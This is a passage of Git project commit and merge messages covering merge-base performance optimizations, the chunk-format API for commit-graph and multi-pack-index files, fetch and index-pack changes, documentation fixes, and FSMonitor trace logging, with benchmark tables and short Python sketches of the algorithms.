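            stack.extend(parents.get(commit, ()))
    return [c for c in commits if c not in stale]
```

Raising the floor is safe because generation numbers strictly decrease
along parent links, so a commit below the floor cannot reach any target
that is still live.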
This requires more than two commits in order to test, so I used the
Linux kernel repository with a few commits that are slightly off of the
first-parent history. I timed the following command:
git merge-base --independent 2ecedd756908 d2360a398f0b \
1253935ad801 160bab43419e 0e2209629fec 1d0e16ac1a9e
The first two commits have similar generation and are near the v5.10
tag. Commit 160bab43419e is off of the first-parent history behind v5.5,
while the others are scattered somewhere reachable from v5.9. This is
designed to demonstrate the optimization, as that commit within v5.5
would normally cause a lot of extra commit walking.
Since remove_redundant_with_gen() is called only when at least one of
the input commits has a finite generation number, this algorithm is
tested with a commit-graph generated starting at a number of different
tags, the earliest being v5.5.
commit-graph at v5.5:
| Method                | Time  |
|-----------------------+-------|
| *_no_gen()            | 864ms |
| *_with_gen() (before) | 858ms |
| *_with_gen() (after)  | 810ms |
commit-graph at v5.7:
| Method                | Time  |
|-----------------------+-------|
| *_no_gen()            | 625ms |
| *_with_gen() (before) | 572ms |
| *_with_gen() (after)  | 517ms |
commit-graph at v5.9:
| Method                | Time  |
|-----------------------+-------|
| *_no_gen()            | 268ms |
| *_with_gen() (before) | 224ms |
| *_with_gen() (after)  | 202ms |
commit-graph at v5.10:
| Method                | Time  |
|-----------------------+-------|
| *_no_gen()            | 72ms  |
| *_with_gen() (before) | 37ms  |
| *_with_gen() (after)  | 9ms   |
Note that these are only modest improvements for the case where the two
independent commits are not in the commit-graph (not until v5.10). All
algorithms get faster as more commits are indexed, which is not a
surprise. However, the cost of walking extra commits is more and more
prevalent in relative terms as more commits are indexed. Finally, the
last case allows us to jump to the minimum generation between the last
two commits (that are actually independent) so we greatly reduce the
cost in that case.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Reachability algorithms in commit-reach.c frequently benefit from using
the first-parent history as a heuristic for satisfying reachability
queries. The most obvious example was implemented in 4fbcca4e
(commit-reach: make can_all_from_reach... linear, 2018-07-20).
Update the walk in remove_redundant() to use this same heuristic. Here,
we are walking starting at the parents of the input commits. Sort those
parents and walk from the highest generation to lower. Each time, use
the heuristic of searching the first parent history before continuing to
expand the walk.
The order in which we explore the commits matters, so update
compare_commits_by_gen to break generation number ties with commit date.
This has no effect when the commits are in a commit-graph file with
corrected commit dates computed, but it will assist when the commits are
in the region "above" the commit-graph with "infinite" generation
number. Note that we cannot shift to use
compare_commits_by_gen_then_commit_date as the method prototype is
different. We use compare_commits_by_gen for QSORT() as opposed to as a
priority function.
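The tie-breaking rule described above can be sketched as follows. This is a minimal illustration in Python, not the C code from commit-reach.c; the `Commit` tuple and the use of `float("inf")` for the "infinite" generation number are assumptions made for the example.

```python
import functools
from collections import namedtuple

# Hypothetical stand-in for a commit: a name, a generation number and a date.
Commit = namedtuple("Commit", ["name", "generation", "date"])

# Assumed marker for commits "above" the commit-graph.
GENERATION_INFINITY = float("inf")


def compare_commits_by_gen(a, b):
    """Order by generation number, breaking ties with the commit date."""
    if a.generation != b.generation:
        return -1 if a.generation < b.generation else 1
    if a.date != b.date:
        return -1 if a.date < b.date else 1
    return 0


def sort_for_walk(commits):
    """Sort ascending, then reverse so the walk starts at the highest commit."""
    ordered = sorted(commits, key=functools.cmp_to_key(compare_commits_by_gen))
    return list(reversed(ordered))
```

With two commits of infinite generation, the date decides which one is explored first; without the tie-break their relative order would be arbitrary.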
The important piece is to ensure we short-circuit the walk when we find
that there is a single non-redundant commit. This happens frequently
when looking for merge-bases or comparing several tags with 'git
merge-base --independent'. Use a new count 'count_still_independent' and
if that hits 1 we can stop walking.
To update 'count_still_independent' properly, we add use of the RESULT
flag on the input commits. Then we can detect when we reach one of these
commits and decrease the count. We need to remove the RESULT flag at
that moment because we might re-visit that commit when popping the
stack.
We use the STALE flag to mark parents that have been added to the new
walk_start list, but we need to clear that flag before we start walking
so those flags don't halt our depth-first-search walk.
On my copy of the Linux kernel repository, the performance of 'git
merge-base --independent <all-tags>' goes from 1.1 seconds to 0.11
seconds.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move this earlier in the file so it can be used by more methods.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The current implementation of remove_redundant() uses several calls to
paint_down_to_common() to determine that commits are independent of each
other. This leads to quadratic behavior when many inputs are passed to
commands such as 'git merge-base'.
For example, in the Linux kernel repository, I tested the performance
by passing all tags:
git merge-base --independent $(git for-each-ref refs/tags --format="%(refname)")
(Note: I had to delete the tags v2.6.11-tree and v2.6.11 as they do
not point to commits.)
Here is the performance improvement introduced by this change:
Before: 16.4s
After: 1.1s
This performance improvement requires the commit-graph file to be
present. We keep the old algorithm around as remove_redundant_no_gen()
and use it when generation_numbers_enabled() is false. This is similar
to other algorithms within commit-reach.c. The new algorithm is
implemented in remove_redundant_with_gen().
The basic approach is to do one commit walk instead of many. First, scan
all commits in the list and mark their _parents_ with the STALE flag.
This flag will indicate commits that are reachable from one of the
inputs, excluding the inputs themselves. Then, walk commits down to
the minimum generation number among the inputs, pushing the STALE
flag throughout.
At the end, we need to clear the STALE bit from all of the commits
we walked. We move the non-stale commits in 'array' to the beginning of
the list, and this might overwrite stale commits. However, we store an
array of commits that started the walk, and use clear_commit_marks() on
each of those starting commits. That method will walk the reachable
commits with the STALE bit and clear them all. This makes the algorithm
safe for re-entry or for other uses of those commits after this walk.
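The single-walk idea can be sketched roughly as below. This is a simplified Python model, not the implementation in remove_redundant_with_gen(): it assumes distinct inputs, a `parents` mapping, and a `generation` mapping in which every commit's generation is larger than that of each of its parents. A set stands in for the STALE flag, so no cleanup pass is needed here.

```python
import heapq


def remove_redundant(inputs, parents, generation):
    """Return the inputs that are not reachable from any other input."""
    min_gen = min(generation[c] for c in inputs)
    stale = set()  # plays the role of the STALE flag
    heap = []      # max-heap on generation, via negated keys

    def mark_parents(commit):
        for p in parents.get(commit, ()):
            if p not in stale:
                stale.add(p)
                heapq.heappush(heap, (-generation[p], p))

    # Start by marking the parents of every input, not the inputs themselves.
    for c in inputs:
        mark_parents(c)

    # One walk in decreasing generation order, stopping below the minimum
    # generation of the inputs: nothing lower can reach an input.
    while heap:
        neg_gen, c = heapq.heappop(heap)
        if -neg_gen < min_gen:
            break
        mark_parents(c)

    return [c for c in inputs if c not in stale]
```

For a history where C is a child of B, and B and D are children of A, passing A, C and D returns C and D, because A is reachable from both of them.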
This logic is covered by tests in t6600-test-reach.sh, so the behavior
does not change. This is tested both in the case with a commit-graph and
without.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Knowing about the core.bigFileThreshold configuration variable is
helpful when examining pack file size differences between repositories.
Add a reference to it to the manpages a user is likely to read in this
situation.
Capitalize CONFIGURATION for consistency with other pages having such a
section.
Signed-off-by: Christian Walther <cwalther@gmx.ch>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Teach index-pack to print dangling .gitmodules links after its "keep" or
"pack" line instead of declaring an error, and teach fetch-pack to check
such lines printed.
This allows the tree side of the .gitmodules link to be in one packfile
and the blob side to be in another without failing the fsck check,
because it is now fetch-pack which checks such objects after all
packfiles have been downloaded and indexed (and not index-pack on an
individual packfile, as it is before this commit).
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Unify the index-pack arguments used when processing the inline pack and
when downloading packfiles referenced by URIs. This is done by teaching
get_pack() to also store the index-pack arguments whenever at least one
packfile URI is given, and then when processing the packfile URI(s),
using the stored arguments.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is the next step in teaching fetch-pack to pass its index-pack
arguments when processing packfiles referenced by URIs.
The "--keep" in fetch-pack.c will be replaced with a full message in a
subsequent commit.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, when fetching, packfiles referenced by URIs are run through
index-pack without any arguments other than --stdin and --keep, no
matter what arguments are used for the packfile that is inline in the
fetch response. As a preparation for ensuring that all packs (whether
inline or not) use the same index-pack arguments, teach the http
subsystem to allow custom index-pack arguments.
http-fetch has been updated to use the new API. For now, it passes
--keep alone instead of --keep with a process ID, but this is only
temporary because http-fetch itself will be taught to accept index-pack
parameters (instead of using a hardcoded constant) in a subsequent
commit.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use git-stripspace to remove comment lines from the commit message. Also
use it to clean up whitespace instead of rolling our own logic.
* py/commit-comments:
git-gui: remove lines starting with the comment character
f4ed0af6 (Merge branch 'nd/columns', 2012-05-03) brought in three
cut-and-pasted copies of malformatted descriptions. Let's fix them
all the same way by marking the configuration variable names up as
monospace just like the command line option `--column` is typeset.
While we are at it, correct a missing space after the full stop that
ends the sentence.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The chunk-based file format is now an API in the code, but we should
also take time to document it as a file format. Specifically, it matches
the CHUNK LOOKUP sections of the commit-graph and multi-pack-index
files, but there are some commonalities that should be grouped in this
document.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Before refactoring into the chunk-format API, the commit-graph parsing
logic included checks for duplicate chunks. It is unlikely that we would
desire a chunk-based file format that allows duplicate chunk IDs in the
table of contents, so add duplicate checks into
read_table_of_contents().
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When calculating the sizes of certain chunks, we should use 64-bit
multiplication always. This allows us to properly predict the chunk
sizes without risk of overflow.
Other possible overflows were discovered by evaluating each
multiplication in midx.c and ensuring that at least one side of the
operator was of type size_t or off_t.
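To illustrate the risk, the sketch below emulates fixed-width unsigned multiplication in Python by masking the result (Python integers do not overflow on their own). The function names and the sample numbers are hypothetical and are not taken from midx.c.

```python
UINT32_MASK = 0xFFFFFFFF
UINT64_MASK = 0xFFFFFFFFFFFFFFFF


def chunk_size_32bit(num_entries, entry_width):
    """Emulate the product as computed in 32-bit unsigned arithmetic."""
    return (num_entries * entry_width) & UINT32_MASK


def chunk_size_64bit(num_entries, entry_width):
    """Emulate the product as computed in 64-bit unsigned arithmetic."""
    return (num_entries * entry_width) & UINT64_MASK
```

With 600,000,000 entries of 8 bytes each, the 32-bit product wraps around to 505,032,704, while the 64-bit product is the expected 4,800,000,000.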
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Instead of parsing the table of contents directly, use the chunk-format
API methods read_table_of_contents() and pair_chunk(). In particular, we
can use the return value of pair_chunk() to generate an error when a
required chunk is missing.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Instead of parsing the table of contents directly, use the chunk-format
API methods read_table_of_contents() and pair_chunk(). While the current
implementation loses the duplicate-chunk detection, that will be added
in a future change.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add the capability to read the table of contents, then pair the chunks
with necessary logic using read_chunk_fn pointers. Callers will be added
in future changes, but the typical outline will be:
1. initialize a 'struct chunkfile' with init_chunkfile(NULL).
2. call read_table_of_contents().
3. for each chunk to parse,
a. call pair_chunk() to assign a pointer with the chunk position, or
b. call read_chunk() to run a callback on the chunk start and size.
4. call free_chunkfile() to clear the 'struct chunkfile' data.
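As a rough model of step 2, the sketch below parses a table of contents in Python. It assumes the layout documented for the commit-graph and multi-pack-index files: 12-byte entries holding a 4-byte chunk ID and an 8-byte big-endian offset, closed by an entry whose ID is zero. The function signature is an assumption for illustration and does not mirror the C API. It also rejects duplicate IDs, a check that another commit in this series adds.

```python
import struct

# 4-byte chunk ID followed by an 8-byte offset, both big-endian.
TOC_ENTRY = struct.Struct(">4sQ")
TERMINATOR_ID = b"\0\0\0\0"


def read_table_of_contents(data, toc_offset, num_chunks):
    """Return {chunk_id: (start, size)} for the chunks listed in the TOC."""
    entries = [
        TOC_ENTRY.unpack_from(data, toc_offset + i * TOC_ENTRY.size)
        for i in range(num_chunks + 1)
    ]
    if entries[-1][0] != TERMINATOR_ID:
        raise ValueError("table of contents lacks a terminating entry")

    chunks = {}
    # Each chunk ends where the next entry (or the terminator) begins.
    for (chunk_id, start), (_, end) in zip(entries, entries[1:]):
        if chunk_id in chunks:
            raise ValueError("duplicate chunk ID %r" % chunk_id)
        if end < start or end > len(data):
            raise ValueError("chunk %r has an invalid offset" % chunk_id)
        chunks[chunk_id] = (start, end - start)
    return chunks
```

A caller would then look up the chunks it requires in the returned mapping and report an error for any that are missing.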
We are re-using the anonymous 'struct chunkfile' data, as it is internal
to the chunk-format API. This gives it essentially two modes: write and
read. If the same struct instance was used for both reads and writes,
then there would be failures.
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The chunk-format API allows writing the table of contents and all chunks
using the anonymous 'struct chunkfile' type. We only need to convert our
local chunk logic to this API for the multi-pack-index writes to share
that logic with the commit-graph file writes.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Most expensive operations in write_midx_internal() use the context
struct's progress member, and these indicate the progress of the
expensive operations within the chunk writing methods. However, there is
a competing progress struct that counts the progress over all chunks.
This is not very helpful compared to the others, so drop it.
This also reduces our barriers to combining the chunk writing code with
chunk-format.c.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Historically, the chunk-writing methods in midx.c have returned the
amount of data written so the writer method could compare this with the
table of contents. This presents some interesting issues:
1. If a chunk writing method has a bug that miscalculates the written
bytes, then we can satisfy the table of contents without actually
writing the right amount of data to the hashfile. The commit-graph
writing code checks the hashfile struct directly for a more robust
verification.
2. There is no way for a chunk writing method to gracefully fail.
Returning an int presents an opportunity to fail without a die().
3. The current pattern doesn't match chunk_write_fn type exactly, so we
cannot share code with commit-graph.c
For these reasons, convert the midx chunk writer methods to return an
'int'. Since none of them fail at the moment, they all return 0.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In an effort to align write_midx_internal() with the chunk-format API,
continue to group necessary data into "struct write_midx_context". This
change collects the "uint32_t num_large_offsets" into the context. With
this new data, write_midx_large_offsets() now matches the
chunk_write_fn type.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In an effort to align write_midx_internal() with the chunk-format API,
continue to group necessary data into "struct write_midx_context". This
change collects the "uint32_t *pack_perm" and large_offsets_needed bit
into the context.
Update write_midx_object_offsets() to match chunk_write_fn.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In an effort to align write_midx_internal() with the chunk-format API,
continue to group necessary data into "struct write_midx_context". This
change collects the "struct pack_midx_entry *entries" list and its count
into the context.
Update write_midx_oid_fanout() and write_midx_oid_lookup() to take the
context directly, as these are easy conversions with this new data.
Only the callers of write_midx_object_offsets() and
write_midx_large_offsets() are updated here, since additional data is
needed in the context before those methods can match chunk_write_fn.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In an effort to align the write_midx_internal() to use the chunk-format
API, start converting chunk writing methods to match chunk_write_fn. The
first case is to convert write_midx_pack_names() to take "void *data".
We already have the necessary data in "struct write_midx_context", so
this conversion is rather mechanical.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In an effort to streamline our chunk-based file formats, align some of
the code structure in write_midx_internal() to be similar to the
patterns in write_commit_graph_file().
Specifically, let's create a "struct write_midx_context" that can be
used as a data parameter to abstract function types.
This change only renames "struct pack_info" to "struct
write_midx_context" and the names of instances from "packs" to "ctx". In
future changes, we will expand the data inside "struct
write_midx_context" and align our chunk-writing method with the
chunk-format API.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The commit-graph write logic is ready to make use of the chunk-format
write API. Each chunk write method is already in the correct prototype.
We only need to use the 'struct chunkfile' pointer and the correct API
calls.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In anticipation of combining the logic from the commit-graph and
multi-pack-index file formats, create a new chunk-format API. Use a
'struct chunkfile' pointer to keep track of data that has been
registered for writes. This struct is anonymous outside of
chunk-format.c to ensure no user attempts to interfere with the data.
The next change will use this API in commit-graph.c, but the general
approach is:
1. initialize the chunkfile with init_chunkfile(f).
2. add chunks in the intended writing order with add_chunk().
3. write any header information to the hashfile f.
4. write the chunkfile data using write_chunkfile().
5. free the chunkfile struct using free_chunkfile().
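The write order above can be modeled in a few lines of Python. This is only a sketch: it assumes 12-byte table-of-contents entries (4-byte chunk ID, 8-byte big-endian offset) and a terminating entry with a zero ID, as in the commit-graph file format. The function below is hypothetical and is not the C write_chunkfile().

```python
import struct

# 4-byte chunk ID followed by an 8-byte offset, both big-endian.
TOC_ENTRY = struct.Struct(">4sQ")


def write_chunkfile(header, chunks):
    """Return header + table of contents + chunk data as one bytes object.

    `chunks` is a list of (chunk_id, data) pairs in the intended order.
    """
    toc_size = (len(chunks) + 1) * TOC_ENTRY.size
    offset = len(header) + toc_size  # the first chunk starts after the TOC
    toc = bytearray()
    body = bytearray()
    for chunk_id, data in chunks:
        toc += TOC_ENTRY.pack(chunk_id, offset)
        body += data
        offset += len(data)
    # The terminating entry records where the last chunk ends.
    toc += TOC_ENTRY.pack(b"\0\0\0\0", offset)
    return bytes(header) + bytes(toc) + bytes(body)
```

Because every offset is derived from the sizes of the preceding chunks, the table of contents can be emitted before any chunk data is written.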
Helped-by: Taylor Blau <me@ttaylorr.com>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Both AsciiDoc and Asciidoctor are eager to pick up the e-mail addresses
in this document and turn them into references at the bottom of the
manpage / clickable links. We don't really need that for these dummy
addresses. Spell "@" as a character reference to make them not do this. In the open
block, we can instead avoid this by indenting the contents, similar to
the earlier blocks.
Fix a backtick which should have been a single quote mark. With all the
quoting that is going on around here, this mistake trips up the parsing
and rendering quite a bit.
Before this commit, we have the same failure mode with AsciiDoc 8.6.10
and Asciidoctor 1.5.5, and this change makes both of them happy.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Acked-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we write `<name>`s with the "s" tucked on to the closing backtick,
we end up rendering the backticks literally. Rephrase this sentence
slightly to render this as monospace.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The comment character is specified by the config variable
'core.commentchar'. Any line starting with this character is considered
a comment and should not be included in the final commit message.
Teach git-gui to filter out lines in the commit message that start with
the comment character using git-stripspace. If the config is not set,
'#' is taken as the default. Also add a message educating users about
the comment character.
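The intended filtering can be approximated in Python as shown below. This is a simplified model of comment stripping and whitespace cleanup, not a reimplementation of git-stripspace; the function name is hypothetical.

```python
def strip_comments(message, comment_char="#"):
    """Drop comment lines and tidy whitespace in a commit message."""
    cleaned = []
    for line in message.splitlines():
        if line.startswith(comment_char):
            continue  # comment lines never reach the commit message
        line = line.rstrip()
        if not line and (not cleaned or not cleaned[-1]):
            continue  # skip leading blank lines and collapse blank runs
        cleaned.append(line)
    while cleaned and not cleaned[-1]:
        cleaned.pop()  # drop trailing blank lines
    return "".join(line + "\n" for line in cleaned)
```

Passing a different `comment_char` models a repository where the comment character has been changed from the default '#'.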
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
The error message given when a configuration variable that is
expected to have a boolean value has been improved.
* ak/config-bad-bool-error:
config: improve error message for boolean config
"git reflog expire --stale-fix" can be used to repair the reflog by
removing entries that refer to objects that have been pruned away,
but was not careful to tolerate missing objects.
* js/reflog-expire-stale-fix:
reflog expire --stale-fix: be generous about missing objects
When certain features (e.g. grafts) used in the repository are
incompatible with the use of the commit-graph, we used to silently
turn commit-graph off; we now tell the user what we are doing.
* js/commit-graph-warning:
commit-graph: when incompatible with graphs, indicate why
Test to make sure "git rev-parse one-thing one-thing" gives
the same thing twice (when one-thing is --since=X).
* ew/rev-parse-since-test:
t1500: ensure current --since= behavior remains
Prevent individual tests in t5411 from affecting each other
by forcing them to use separate output files during the test.
* jx/t5411-unique-filenames:
t5411: refactor check of refs using test_cmp_refs
t5411: use different out file to prevent overwriting
Fix "git fsck --name-objects" which apparently has not been used by
anybody who is motivated enough to report breakage.
* js/fsck-name-objects-fix:
fsck --name-objects: be more careful parsing generation numbers
t1450: robustify `remove_object()`
The .mailmap is documented to be read only from the root level of a
working tree, but a stray file in a bare repository also was read
by accident, which has been corrected.
* jk/mailmap-only-at-root:
mailmap: only look for .mailmap in work tree
"git grep --untracked" is meant to be "let's ALSO find in these
files on the filesystem" when looking for matches in the working
tree files, and does not make any sense if the primary search is
done against the index, or the tree objects. The "--cached" and
"--untracked" options have been marked as mutually incompatible.
* mt/grep-cached-untracked:
grep: error out if --untracked is used with --cached
"git mergetool" feeds three versions (base, local and remote) of
a conflicted path unmodified. The command learned to optionally
prepare these files with unconflicted parts already resolved.
* sh/mergetool-hideresolved:
mergetool: add per-tool support and overrides for the hideResolved flag
mergetool: break setup_tool out into separate initialization function
mergetool: add hideResolved configuration
Even though invocations of "die()" were logged to the trace2
system, "BUG()"s were not, which has been corrected.
* jt/trace2-BUG:
usage: trace2 BUG() invocations
The "git range-diff" command learned "--(left|right)-only" option
to show only one side of the compared range.
* js/range-diff-one-side-only:
range-diff: offer --left-only/--right-only options
range-diff: move the diffopt initialization down one layer
range-diff: combine all options in a single data structure
range-diff: simplify code spawning `git log`
range-diff: libify the read_patches() function again
range-diff: avoid leaking memory in two error code paths
There are other ways than ".." for a single token to denote a
"commit range", namely "<rev>^!" and "<rev>^-<n>", but "git
range-diff" did not understand them.
* js/range-diff-wo-dotdot:
range-diff(docs): explain how to specify commit ranges
range-diff/format-patch: handle commit ranges other than A..B
range-diff/format-patch: refactor check for commit range
"git clone" tries to locally check out the branch pointed at by
HEAD of the remote repository after it is done, but the protocol
did not convey the information necessary to do so when copying an
empty repository. The protocol v2 learned how to do so.
* jt/clone-unborn-head:
clone: respect remote unborn HEAD
connect, transport: encapsulate arg in struct
ls-refs: report unborn targets of symrefs
Piecemeal rewrite of "git bisect" in C continues.
* mr/bisect-in-c-4:
bisect--helper: retire `--check-and-set-terms` subcommand
bisect--helper: reimplement `bisect_skip` shell function in C
bisect--helper: retire `--bisect-auto-next` subcommand
bisect--helper: use `res` instead of return in BISECT_RESET case option
bisect--helper: retire `--bisect-write` subcommand
bisect--helper: reimplement `bisect_replay` shell function in C
bisect--helper: reimplement `bisect_log` shell function in C
Fix incremental update of commit-graph file around corrected commit
date data.
* ds/commit-graph-genno-fix:
commit-graph: prepare commit graph
commit-graph: be extra careful about mixed generations
commit-graph: compute generations separately
commit-graph: validate layers for generation data
commit-graph: always parse before commit_graph_data_at()
commit-graph: use repo_parse_commit
The commit-graph learned to use corrected commit dates instead of
the generation number to help topological revision traversal.
* ak/corrected-commit-date:
doc: add corrected commit date info
commit-reach: use corrected commit dates in paint_down_to_common()
commit-graph: use generation v2 only if entire chain does
commit-graph: implement generation data chunk
commit-graph: implement corrected commit date
commit-graph: return 64-bit generation number
commit-graph: add a slab to store topological levels
t6600-test-reach: generalize *_three_modes
commit-graph: consolidate fill_commit_graph_info
revision: parse parent in indegree_walk_step()
commit-graph: fix regression when computing Bloom filters
Git Protocol version 2[1] defines 0002 as a Message Packet that indicates
the end of a response for stateless connections.
Change the naming of the 0002 Packet to 'Response End' to match the
parsing introduced in Wireshark's MR !1922[2] for consistency. A subsequent
MR in Wireshark will address additional mismatches.
[1] kernel.org/pub/software/scm/git/docs/technical/protocol-v2.html
[2] gitlab.com/wireshark/wireshark/-/merge_requests/1922
Signed-off-by: Joey Salazar <jgsal@protonmail.com>
Reviewed-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It's not immediately obvious why --disk-usage might be a useful thing.
These examples show off a few of the real-world cases I've used it for.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We currently don't show any examples of using git-rev-list at all. Let's
add some pretty elementary examples. They likely seem obvious to anybody
who has worked with the tool for a while, but my purpose here is
two-fold:
- they may be enlightening to people who haven't used the tool a lot
to give a general flavor of how it is meant to be used
- they can serve as a starting point for adding more interesting
examples (we can do that without the basic ones, of course, but I
think it makes sense to show off the building blocks)
This set is far from exhaustive, but again, the purpose is to be a
starting point for further additions.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In git-log(1) -- but not in git-shortlog(1) or git-rev-list(1) -- we
include a bonus paragraph in the description of `--first-parent`. But
we forgot to add a lone "+" for a list continuation, and we shouldn't
be indenting this second paragraph. As a result, we get a different
indentation and the `backticks` render literally.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When `git blame --color-by-age` is used, determine_line_heat() is called
to select how to color the output based on the commit's author date. It
uses get_commit_info() to parse the information into a `commit_info`
structure; however, this is unnecessary because the caller of
determine_line_heat() has already done the same.
Instead, let's change determine_line_heat() to take a `commit_info`
structure and remove the internal call to get_commit_info(), thus
cleaning up and optimizing the code path.
To measure the effect, Git's trace2 API was enabled to record the
execution time of every call to determine_line_heat():
+ trace2_region_enter("blame", "determine_line_heat", the_repository);
determine_line_heat(ent, &default_color);
+ trace2_region_leave("blame", "determine_line_heat", the_repository);
Then, running `git blame` for "kernel/fork.c" in linux.git and summing
all the execution time for every call (around 1.3k calls) resulted in
2.6x faster execution (best out of 3):
git built from 328c109303 (The eighth batch, 2021-02-12) = 42ms
git built from 328c109303 + this change = 16ms
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Isolate and document initialization of `istate->fsmonitor_last_update`.
This field should contain a fsmonitor-specific opaque token, but we
need to initialize it before we can actually talk to a fsmonitor process,
so we create a generic default value.
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Let's measure the time taken to request and receive FSMonitor data
via the hook API and the size of the response.
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Report the number of files in the working directory that were read and
their hashes verified in `refresh_index()`.
FSMonitor improves the performance of commands like `git status` by
avoiding scanning the disk for changed files. Let's measure this.
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Report the total number of calls made to lstat() inside of refresh_index().
FSMonitor improves the performance of commands like `git status` by
avoiding scanning the disk for changed files. This can be seen in
`refresh_index()`. Let's measure this.
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Report the total number of calls made to lstat() inside preload_index().
FSMonitor improves the performance of commands like `git status` by
avoiding scanning the disk for changed files. This can be seen in
`preload_index()`. Let's measure this.
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add optional trace logging to allow us to better compare performance of
various fsmonitor providers and compare results with non-fsmonitor runs.
Currently, this includes Trace2 logging, but may be extended to include
other trace targets, such as GIT_TRACE_FSMONITOR if desired.
Using this logging helped me explain an odd behavior on macOS where the
kernel was dropping events and causing the hook to Watchman to time out.
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Shut down Watchman after the Watchman-based tests and before the block of
"no fsmonitor" tests.
This helps ensure that Watchman cannot affect the results of the
other tests.
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Only use the final portion of the test trash directory file name
when verifying that Watchman was started.
On Windows and under the SDK, $GIT_WORKTREE is a cygwin-style
path with forward slashes and a "/c/" drive name. However
`watchman watch-list` reports a proper Windows-style pathname
with drive letters and backslashes. This causes the grep to
fail. Since we don't really care about the full pathname (and
we really don't want to bother with normalizing them), just see
if the test-name portion of the path is found.
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Convert the test to use a more portable method to update the mtime on a
large number of files under version control.
The Mac version of xargs does not support the "-d" option.
Likewise, the "-0" and "--null" options are not portable.
Furthermore, use `test-tool chmtime` rather than `touch` to update the
mtime to ensure that it is actually updated (especially on file systems
